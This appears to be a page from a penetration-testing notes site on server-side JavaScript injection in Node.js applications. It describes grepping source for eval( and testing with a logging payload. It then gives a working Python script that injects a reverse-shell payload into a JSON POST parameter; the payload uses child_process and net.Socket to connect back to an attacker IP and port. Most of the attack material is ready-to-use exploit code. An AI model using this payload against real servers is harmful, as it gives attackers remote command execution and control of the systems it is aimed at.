JavaScript Injection

In the case of JavaScript, a search for the eval function should be on top of that list, as it allows the user to execute arbitrary code:

grep -rnw "eval(" . --color

Then we should search through the files which the previous grep command points.

If we see that JSON POST Requests are used to trigger the processing function, we could try to inject javascript commands appended to one of the json parameters:

require('util').log('CODE_EXECUTION');

If it works, to get a reverse shell:

request_1 = '{"method":"get","path":"/example1"}'
request_2 = '{"method":"get","path":"/example2"}'

shell = 'var net = require(\'net\'),sh = require(\'child_process\').exec(\'%s\'); ' % cmd
shell += 'var client = new net.Socket(); '
shell += 'client.connect(%s, \'%s\', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);' % (attackerport, attackerip)
shell += 'sh.stderr.pipe(client);});'

request_3 = '{"method":"get","path":"/item/$1.id;%s"}' % shell
json = '{"requests":[%s,%s,%s]}' % (request_1, request_2, request_3)

r = requests.post(target, json)
print r.content

PreviousSQL Injection NextSSTI (Server-Side Template Injection)

Last updated 8 months ago